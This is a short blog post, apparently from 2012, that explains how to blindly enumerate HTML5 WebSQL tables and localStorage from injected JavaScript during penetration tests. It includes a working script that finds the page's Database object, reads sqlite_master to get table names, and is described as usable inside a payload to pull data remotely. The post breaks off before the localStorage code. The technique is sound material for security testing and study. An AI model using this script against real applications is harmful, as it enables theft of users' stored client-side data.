Pages

Saturday, January 07, 2012

Blind WebSQL and Storage extraction for HTML5 Apps

HTML5 is having two important data points – WebSQL and
Storage. They are controlled by well defined RFCs and specifications. These
APIs can be accessed using JavaScript. Assuming we get an entry into DOM then
also we are completely blind with WebSQL table names and storage keys. Here is
a way to enumerate that data during pen-testing and assessments.

Blind WebSQL Enumeration

We need following information to extract target content.

1.Database object

2.Table structure created on SQLite

3.User table on which we need to run select query

Here is the script which can harvest database with
zero knowledge

var
dbo;

var
table;

var
usertable;

for(i
in window){

obj = window[i];

try{

if(obj.constructor.name=="Database"){

dbo
= obj;

obj.transaction(function(tx){

tx.executeSql('SELECT
name FROM sqlite_master WHERE type=\'table\'',[],function(tx,results){

table=results;

},null);

});

}

}catch(ex){}

}

if(table.rows.length>1)

usertable=table.rows.item(1).name;

a.)We will run through all objects and get object
where constructor is “Database”

b.)We will make Select query directly to
sqlite_master database

c.)We will grab 1st table leaving webkit
table on 0th entry

We got the actual table name residing on WebSQL for
this application, next we can run SQL query and loop through results.

We got the name of the table and now we can use same database object to run the query through script.

Hence, it can be part of payload during testing to fetch
data remotely.

Blind Storage Enumeration

Storage enumeration is relatively easy, We can check for
object length for local or session storage and if it is not zero run a loop and
get all values. We can use following code for localStorage.